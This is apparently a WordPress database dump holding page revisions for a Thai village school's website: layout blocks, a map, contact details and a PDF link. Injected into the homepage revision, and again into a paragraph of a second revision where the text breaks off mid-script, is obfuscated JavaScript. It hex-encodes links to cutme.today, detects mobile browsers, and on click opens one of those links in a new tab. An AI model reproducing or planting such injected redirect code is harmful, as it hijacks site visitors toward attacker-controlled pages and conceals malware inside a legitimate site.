{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-06 21:09:15','2024-08-06 14:09:15','',14,'http://pakhaeng.ssk.in.th/?p=565',0,'revision','',0),
(566,1,'2024-08-06 21:14:34','2024-08-06 14:14:34','<!-- wp:image {\"id\":1748,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Human-1024x256.png\" alt=\"\" class=\"wp-image-1748\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1499,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\",\"displayPreview\":true,\"previewHeight\":800} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" type=\"application/pdf\" style=\"width:100%;height:800px\" aria-label=\"การบริหารและพัฒนาทรัพยากรบุคคล\"></object><a id=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\">การบริหารและพัฒนาทรัพยากรบุคคล</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-00124d1a-79ba-4db0-be25-eed8c6e99073\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:paragraph -->\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 